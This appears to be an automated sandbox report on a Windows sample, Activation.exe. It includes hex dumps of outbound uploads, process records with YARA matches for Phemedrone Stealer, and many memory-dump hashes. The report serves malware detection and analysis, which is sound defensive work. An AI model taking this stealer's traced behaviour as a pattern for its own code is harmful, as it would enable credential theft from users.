                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: f3 b6 3b a6 20 49 bd 18 df 31 d6 28 96 a4 e0 d3 61 c1 ec 8f c6 73 f7 8d f3 5f 85 f9 7f ad 79 f9 19 3a a3 43 07 20 a2 ee 0f 77 bc 34 5c 14 cf fb ee 76 5b 84 d5 3e 11 d9 ee 27 e1 81 f8 f7 d2 8e ff 3c 2d 4c fd e7 c3 62 ee f1 2a f7 89 b3 9e 0a e1 f1 8b c2 c7 4d 6e e9 a3 8f 27 c9 87 04 44 28 c2 1f 55 42 ee f1 70 e4 46 1f 0d 93 ff 66 df f0 cb f8 dd be bb f3 4e e1 0f 77 38 a6 12 7d 7f b8 43 f1 d9 4b 1f 0d e1 a2 43 8a 1c fc c1 bc 9f 14 df 69 db 2d c2 ef ae bb 53 f8 dd 43 6e 8d 67 3d 9b 3e e7 f7 67 ef 1e 3e 34 fb c8 70 d4 13 21 3c f0 a3 23 8b fc ba 27 c5 fa a7 52 fd 6a 1f 8f 6c 5b fc 0c 9f 8b b5 48 40 3a 01 fb 2a 00 bf 11 7f af 5b 17 7f 0e 4b 1f 89 7f c6 07 c6 3f 9f 24 e8 22 49 da c5 3f 9f 59 f1 cf e4 af ca 3f 93 cf ee 94 04 9e 3a 06 b5 b7 a1 66 ab cd 43 6d 8d cd
                                                                                      Data Ascii: ; I1(as_y:C w4\v[>'<-Lb*Mn'D(UBpFfNw8}CKCi-SCng=>g>4p!<#'Rjl[H@:*[K?$"I?Y?:fCm
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: 78 f9 f9 4e bd ba 0a 41 e4 1f 10 43 d6 21 f0 a8 e6 53 dc 29 f1 94 7a cc 73 54 58 d1 67 9c dc 78 53 70 94 83 cc 51 11 88 f0 8b 02 10 f1 77 f8 34 f6 e2 d9 25 f7 94 1e 05 5d 84 d8 3c 90 81 0a 3e 84 1e 63 d7 29 f9 e2 3e be 6b 50 f9 c7 5a 05 5c 94 6f f4 95 73 4a 37 e3 31 8f b9 76 9e b1 2d a2 0e 01 68 df 39 fa 40 3f ca bf 58 21 18 25 1f 02 90 3e 73 ec e7 67 66 ac ec 53 de 21 e0 14 74 91 28 ea 94 78 c4 a2 fc 73 0f f7 23 6e df 39 a5 9f cf 35 e6 d8 3e f9 48 43 64 1b 02 90 16 e1 07 ca 37 e5 9c 42 8e 96 31 39 c6 0f 3c 90 76 93 83 0f 2a cf 1e 88 e3 43 0f 2e df 79 88 cf 5b b3 f1 80 f2 33 15 e8 9f f0 e0 f2 7b f7 c0 b2 fe 01 e5 b9 a5 65 7c e4 41 e5 bb 29 63 2a 01 3d da 4b ab d8 63 0c c8 3f 8f fa 12 8f 28 0e f7 05 e0 0e 89 92 6f 1e ed cf 3d ce 79 44 36 48 c0 ec 39 33 b9
                                                                                      Data Ascii: xNAC!S)zsTXgxSpQw4%]<>c)>kPZ\osJ71v-h9@?X!%>sgfS!t(xs#n95>HCd7B19<v*C.y[3{e|A)c*=Kc?(o=yD6H93
                                                                                      2024-12-04 14:12:01 UTC145OUTData Raw: b1 17 8f fa 2a 00 39 02 cc 78 72 f2 55 35 d6 0a c0 1a 1f e4 5d 44 79 57 2b f8 82 d0 43 f0 29 04 ad f0 03 e5 a0 17 86 28 02 eb da 41 d4 29 ed 1c d3 2a 00 11 7f ad 00 64 fe 84 d3 ca ef c1 70 f4 98 78 cc 63 1d 79 ee a1 94 53 c2 d1 7a 8c 37 ca bf 2c 6f 94 75 05 62 f1 38 71 cc f7 e2 10 c6 56 01 d2 8a 79 f1 f9 0a be 78 94 97 d6 3e 20 ee 1c 93 17 ab fe 14 7c 71 2d f9 ec a9 f0 33 46 1b d7 90 83 2c 6b 85 5b 94 69 0a 3c e7 5a c9 d6 8e ed 13
                                                                                      Data Ascii: *9xrU5]DyW+C)(A)*dpxcySz7,oub8qVyx> |q-3F,k[i<Z
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: 67 2d 17 85 d0 67 7f e3 e6 b5 f9 b1 1a 31 ee c7 58 51 c8 3e f4 c9 8b 9f 3b 7e e6 b8 46 b9 87 b0 03 fa 51 0a 5a 01 a8 d4 73 de 7c e2 8c 63 55 a0 b9 bc 33 70 ac 00 6c 25 dc 31 15 80 81 ac ea 2f 8b dd 97 99 25 06 77 43 14 c6 bd 53 82 00 db 0b a6 a5 da 5e d0 cb bd 59 4c 49 bf 04 2e e9 58 bb f8 fb 43 bb 15 8e eb 4e c3 11 de 9e 2a 04 87 0a c0 59 54 51 18 44 20 28 0a 11 82 eb 57 de dd 6d bc f3 27 dd 81 77 dd 5d e1 62 11 2e 19 51 08 f2 33 d6 ef 32 ca c0 ca cd 3d cd 11 e0 2d 9c bb 29 db 14 78 eb e7 7f 7f 29 e6 49 bf 59 f1 55 c9 a4 5f 24 93 76 bb 49 26 00 23 ad a8 3b da ec b6 00 6c c9 a4 de 2a 64 02 70 37 59 4b 24 e0 2a 6c ca c2 f2 79 13 14 83 b3 50 00 6e 94 7e 2b fa 88 65 b2 ee a8 92 49 bd 15 58 7f 7d f9 59 16 90 49 3e 59 7f 7d d9 e7 75 df 98 62 f2 da af 2f 4d 14
                                                                                      Data Ascii: g-g1XQ>;~FQZs|cU3pl%1/%wCS^YLI.XCN*YTQD (Wm'w]b.Q32=-)x)IYU_$vI&#;l*dp7YK$*lyPn~+eIX}YI>Y}ub/M
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: ce 05 de 4e 39 d6 df 55 2b 00 57 41 39 b8 ce 11 e9 8b ca 77 98 31 fc 9c a3 2c 44 fe 71 b4 37 4a c2 c2 58 e9 97 bc 3f f0 c0 95 77 d6 5b 85 8f f9 9f ab 44 d4 ed 25 fb 02 f0 be 2b 00 21 13 7e 2d f7 05 01 b8 1b 64 d2 2f 92 49 bc 48 2b 00 25 cb 8d 6c 57 00 c2 d1 10 80 cb ae 53 00 6e 57 04 8e 47 85 13 f1 17 c9 e4 1f 64 d2 0f 0e bc ec af 2b 99 bc db 29 ca bf a3 55 01 08 51 02 ce 25 91 7f 12 05 e0 28 f8 9a 77 01 b6 b4 02 70 55 09 b8 8a 00 6c e5 df ac b8 d4 f1 73 a6 e5 5f 94 7d 91 4c 02 b6 39 b3 e2 ce 45 f1 67 ae 95 7c c8 3c 65 1f 63 8e fb 12 8b f3 a3 f4 1b 84 60 95 82 4f 2b ed d3 cb ba 00 31 58 7f 6a c9 1d c6 f4 c5 f9 ca 20 f3 24 4a be 76 2e ce d3 57 14 c6 0a c0 2a f9 9e dc b7 08 40 21 06 6d e5 5f 24 4a 40 05 20 f2 0f 14 7e 48 3c 2b 00 ad f8 9b c5 2a 02 d0 4a c0
                                                                                      Data Ascii: N9U+WA9w1,Dq7JX?w[D%+!~-d/IH+%lWSnWGd+)UQ%(wpUls_}L9Eg|<ec`O+1Xj $Jv.W*@!m_$J@ ~H<+*J
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: 6c db 1a e1 bd 4e 56 00 9e 7f c1 05 59 9a 6c 09 4e 3b fd 7d e1 7b f2 44 e2 4f 84 52 6f 1c 02 d9 17 21 01 b8 a5 3f ab 50 f6 45 04 52 6e 39 41 00 6e f1 9f ab 48 ec 8d 88 97 7b 7a 2e e0 7c f8 35 53 9b ec ef ea d5 f6 ef 3a 71 2f 06 89 5d 63 ff 26 39 10 82 1c 07 46 0a 52 11 08 b3 1f fb 6d 5a f3 d1 17 d3 ea eb 9a 5b 85 d9 af 7d 0d 2a 10 f3 b3 02 8d 7c 5c d8 a1 23 bc 19 64 5e 69 07 88 c2 61 02 70 fa e2 85 93 c5 dd a4 08 04 df 7c bc d4 05 60 f4 5c bf 71 88 a4 de 38 ac 08 c0 f1 88 24 de 62 88 e4 1f 84 b2 2f 22 90 7c c3 a8 45 df 20 22 f1 27 22 d1 37 08 2f 00 23 a6 4e b5 3d c7 a0 7b 8a ed eb 88 04 df 7c f4 09 c0 11 c9 cf fd 0b 88 a4 9f 27 92 7e 9e 5a f8 cd 47 2d 00 f5 2c c0 48 fe 79 e6 93 7b 7e 7e 50 4e cc f8 02 10 16 2b 00 25 01 eb 4b 40 74 14 98 31 71 3d 17 b0 96
                                                                                      Data Ascii: lNVYlN;}{DORo!?PERn9AnH{z.|5S:q/]c&9FRmZ[}*|\#d^iap|`\q8$b/"|E "'"7/#N={|'~ZG-,Hy{~~PN+%K@t1q=
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: 1c 97 86 bc db de c7 d9 f6 33 7d d8 95 a9 f3 a7 ee e7 f8 8f ed ef 4c c6 7d 7d 7c 56 1c 41 06 ff 99 b0 d7 ce f6 75 bf cf fe c3 24 dc cb de 4b c6 ed d5 fe 6c da fb cb ff 86 10 eb ff 3e e6 69 fe ed 41 58 fe cb 7f d7 7c 1f 79 76 a1 f5 bb 3b 9d d4 de 02 3c 3f f6 79 0e 23 94 7e 9e 7e 61 b7 d4 cc 11 80 92 7a 5e f4 81 97 80 5e 04 d6 02 50 eb eb 3d bc 10 74 d5 81 53 d7 bd 98 a6 91 7f 06 12 30 1f 19 e6 b8 f0 b5 cf 67 19 a8 a3 c2 dd cb a9 0e 44 08 36 74 2f e5 d8 f0 53 f9 b9 81 f9 f9 81 19 24 20 92 70 2e 91 f0 8b 88 a4 1f e8 b8 70 7d 6c b8 af 1a d1 f0 72 6f 14 96 52 00 42 28 fb 0a 73 72 02 a1 37 2e 2f 25 01 38 67 7e 99 05 a0 6e 04 06 2f 01 c7 85 8b 44 46 e2 03 3f 8e e3 8e a5 16 80 22 96 7f 10 4b be 08 2f fe 6a 01 38 48 02 d6 b1 9a 79 05 e0 c9 fd e2 4f 78 01 08 83 04
                                                                                      Data Ascii: 3}L}}|VAu$Kl>iAX|yv;<?y#~~az^^P=tS0gD6t/S$ p.p}lroRB(sr7./%8g~n/DF?"K/j8HyOx
                                                                                      2024-12-04 14:12:01 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-04 14:12:03 UTC402INHTTP/1.1 400 Bad Request
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 04 Dec 2024 14:12:02 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 56
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:09:11:42
                                                                                      Start date:04/12/2024
                                                                                      Path:C:\Users\user\Desktop\Activation.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Activation.exe"
                                                                                      Imagebase:0xce0000
                                                                                      File size:3'361'979 bytes
                                                                                      MD5 hash:AA3A94BA72728DF41A815B060F5E9C52
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:09:12:02
                                                                                      Start date:04/12/2024
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432
                                                                                      Imagebase:0xac0000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Reset < >
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0
                                                                                        • API String ID: 0-4108050209
                                                                                        • Opcode ID: 47b90769dde519a863c365c009bf527222fd0e50296bca134b046f782e660af1
                                                                                        • Instruction ID: f6768c3c36b9841825d3f65ec830cd270654b93aecaa3d68c79f1039b667f378
                                                                                        • Opcode Fuzzy Hash: 47b90769dde519a863c365c009bf527222fd0e50296bca134b046f782e660af1
                                                                                        • Instruction Fuzzy Hash: 4BC15D31A00259CFCF14DF64C955BA9BBF2FF89300F1581A9E54AAB262DB70AD85DF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f98d6323afc8e15c7892166150be4c97e7f9f0a063e991b94e27236150887da9
                                                                                        • Instruction ID: 5ba8a76003a630e59360c595a45d15f7517883c6642c50595b46118511a4d692
                                                                                        • Opcode Fuzzy Hash: f98d6323afc8e15c7892166150be4c97e7f9f0a063e991b94e27236150887da9
                                                                                        • Instruction Fuzzy Hash: E2321530B012158FDB599B79C85866ABBF2AF88305F2085BDD40ADB350EF75CD82DB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a7876b3e71f112502ee950029db6b57ad742a9bb1bb5ce1976f0deba86f7a23d
                                                                                        • Instruction ID: 668bad42cb26b891651a194e6c0602ce6fa9002d6751481d17a6068212d29071
                                                                                        • Opcode Fuzzy Hash: a7876b3e71f112502ee950029db6b57ad742a9bb1bb5ce1976f0deba86f7a23d
                                                                                        • Instruction Fuzzy Hash: 86B14171E00249CFDF10DFA9C8897AEBBF2AF88314F148529E415E7294EB749A46CB45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1eed0af161db7ae8ef3e79b866b0e6c5e3b09d32548f6b34a94ee3e60aa45c93
                                                                                        • Instruction ID: c9564ec4d9f5b5d46132add0a635378b86cfbd74c0274d7660f31146ca680d31
                                                                                        • Opcode Fuzzy Hash: 1eed0af161db7ae8ef3e79b866b0e6c5e3b09d32548f6b34a94ee3e60aa45c93
                                                                                        • Instruction Fuzzy Hash: BEB16170E00609CFDF18CFA9D889BADBBF2BF88714F148529E415E7254EB749986CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a0911121e9df9dd5edcd2100e82706f97289fdf1ccb8ad4b9246e6177cf57f74
                                                                                        • Instruction ID: 9b5ab672e2fc54d0590628c12adb43f7ed33ffe2fcf5d62ad39296a7453e0631
                                                                                        • Opcode Fuzzy Hash: a0911121e9df9dd5edcd2100e82706f97289fdf1ccb8ad4b9246e6177cf57f74
                                                                                        • Instruction Fuzzy Hash: 3AB14B31A00259CFCF14DF64C954BA9BBF2BF99300F1581A9E44ABB262DB71AD85DF40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kh$b$g
                                                                                        • API String ID: 0-363364455
                                                                                        • Opcode ID: 963041ae61dc021a6fc41e77716e1b131358183fd4d53ed3b626fd0c666c9197
                                                                                        • Instruction ID: 8ef5430fcb30b12744b0a150876144f31b2faa3b624f43e1523180fb1c601151
                                                                                        • Opcode Fuzzy Hash: 963041ae61dc021a6fc41e77716e1b131358183fd4d53ed3b626fd0c666c9197
                                                                                        • Instruction Fuzzy Hash: A4F1ABB290E7C14FEB079B3898687997FB29F47744F1A05D7C581CB1A3DA244C0AC7A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #!$cxFr^$sxFr^
                                                                                        • API String ID: 0-1919659989
                                                                                        • Opcode ID: 6a9f051b03e23027f290a991590d9e6d74904945da599655d5a2985f2dee1e21
                                                                                        • Instruction ID: 81aef6f22db3d0c72017ba5be0280386310edfbdfe58136f30fb26b77b1c3aeb
                                                                                        • Opcode Fuzzy Hash: 6a9f051b03e23027f290a991590d9e6d74904945da599655d5a2985f2dee1e21
                                                                                        • Instruction Fuzzy Hash: 2F419E31B002049FDB15AB64E8996AEBBF2EF88750B14842AE516D7350DF71DE09CBC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kh$b$g
                                                                                        • API String ID: 0-363364455
                                                                                        • Opcode ID: 3891191629a07a3750f4abd3cc8d54c5dcc6b8c5caa335a9b82851a845630fd5
                                                                                        • Instruction ID: 6e0a3c9c57c553b4c43406127d4a0a1520e60b33f55b3f8a14a8006788c22d03
                                                                                        • Opcode Fuzzy Hash: 3891191629a07a3750f4abd3cc8d54c5dcc6b8c5caa335a9b82851a845630fd5
                                                                                        • Instruction Fuzzy Hash: 73516C70A006059FDB14DF79D859A9EBBE2EB88310B108529E516DB391DF71AD05CB90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kyFr^${yFr^
                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: 6134c99277f01d370fa109dbe1cb8f91e3a679e9c1206365977b6ba898d5cdf0
                                                                                        • Instruction ID: 400d35daee5f9396ebd8ada46bbd58fe8650ac2cb21e6bf2bd4933a9bbccf142
                                                                                        • Opcode Fuzzy Hash: 6134c99277f01d370fa109dbe1cb8f91e3a679e9c1206365977b6ba898d5cdf0
                                                                                        • Instruction Fuzzy Hash: 86F18A30B003198FEB15DB78C85476EB7F2BF89700F2085A9D40AAB391EF749D469B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kyFr^${yFr^
                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: 774ed9a3367421baa6657ee6ed68f323f266c4df1445616f63ba82aeb351441b
                                                                                        • Instruction ID: 5ed0621c938615aaf88bf82580b2d9eb0fc642a0a90ab4a8e3cc3a0b5276254e
                                                                                        • Opcode Fuzzy Hash: 774ed9a3367421baa6657ee6ed68f323f266c4df1445616f63ba82aeb351441b
                                                                                        • Instruction Fuzzy Hash: 50F17930B002198FDB15DB78C85476EB7F2BF89700F2085A9D40AAB391EF74AD46DB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kyFr^${yFr^
                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: a3c047a1c845a103c35c066c2d0f60578a17194e0626fc14974f0cbce038f145
                                                                                        • Instruction ID: e9e808eb813310ced52495847fd721cad5b69822cadf15ed930821867509d614
                                                                                        • Opcode Fuzzy Hash: a3c047a1c845a103c35c066c2d0f60578a17194e0626fc14974f0cbce038f145
                                                                                        • Instruction Fuzzy Hash: 44D16A30B003198FDB15DB78D85476EB7F2BF89700F2085A9D40AAB391EF749D469B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: kyFr^${yFr^
                                                                                        • API String ID: 0-856706057
                                                                                        • Opcode ID: 9049732b5a6602ac596685cd2303f0e2c609e84e999fb8a856482281708cb388
                                                                                        • Instruction ID: fecd03b97ea1e8021296f9ef429ffee4700e45d75554608f9a46e14f0dde6819
                                                                                        • Opcode Fuzzy Hash: 9049732b5a6602ac596685cd2303f0e2c609e84e999fb8a856482281708cb388
                                                                                        • Instruction Fuzzy Hash: 60C18A30B002198FEB15EB38D85476EB7F2BF89700F2085A9D40AAB391DF749D469B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        • Opcode ID: 41233d54d827ce10d4d0a80b78719529277da800513408035d9c25ca61b3b439
                                                                                        • Instruction ID: 7f492233aa995e530aa85cb97d5af975f1b6dc7c5a3a038210978356847fef33
                                                                                        • Opcode Fuzzy Hash: 41233d54d827ce10d4d0a80b78719529277da800513408035d9c25ca61b3b439
                                                                                        • Instruction Fuzzy Hash: 4E32E871A006189FDB14CF99C588AADB7F2FF88304F55C669E419AB365CB30ED46CB84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,
                                                                                        • API String ID: 0-3772416878
                                                                                        • Opcode ID: 43c09845b94f0a9a8db8d802eb85dd0099dd904afd8a336b55b4aad16f255789
                                                                                        • Instruction ID: 0af6860a7778672b8196715cbca67cc803a56bec5b23a671454646ebcf3f6887
                                                                                        • Opcode Fuzzy Hash: 43c09845b94f0a9a8db8d802eb85dd0099dd904afd8a336b55b4aad16f255789
                                                                                        • Instruction Fuzzy Hash: 0E81CF71A0020ACFDB14DFA4C499B7EB7B2FF86310F1585A9D4169B292CF309D4ACB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4<Hq
                                                                                        • API String ID: 0-1826498745
                                                                                        • Opcode ID: 94ac9580d2f5085947f3921f14f0b071193cbac85667763b8f8fda3e9a2b52ac
                                                                                        • Instruction ID: 11e27364b6f9af0749dd11e50b1f5727c2c17662825a0eb642a576b849dd58b5
                                                                                        • Opcode Fuzzy Hash: 94ac9580d2f5085947f3921f14f0b071193cbac85667763b8f8fda3e9a2b52ac
                                                                                        • Instruction Fuzzy Hash: 08816E30B002059FDB08DBB5D898B6EB7E2EF89300F24852DE556AB391DF759D068B91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4<Hq
                                                                                        • API String ID: 0-1826498745
                                                                                        • Opcode ID: 5fdc34c729ed8c62dfe304c24e636d4ca4a0d58d0308d8e88de8c486174dea53
                                                                                        • Instruction ID: 7713d2b7aebcca0a35fb1be05e142855381dbd7c649fe9f060859270adf4ef7b
                                                                                        • Opcode Fuzzy Hash: 5fdc34c729ed8c62dfe304c24e636d4ca4a0d58d0308d8e88de8c486174dea53
                                                                                        • Instruction Fuzzy Hash: 65819E70B002058FDB09DB75D898B6E77E2AF8A300B28C56DD546DB391DF75DD0A8B81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4<Hq
                                                                                        • API String ID: 0-1826498745
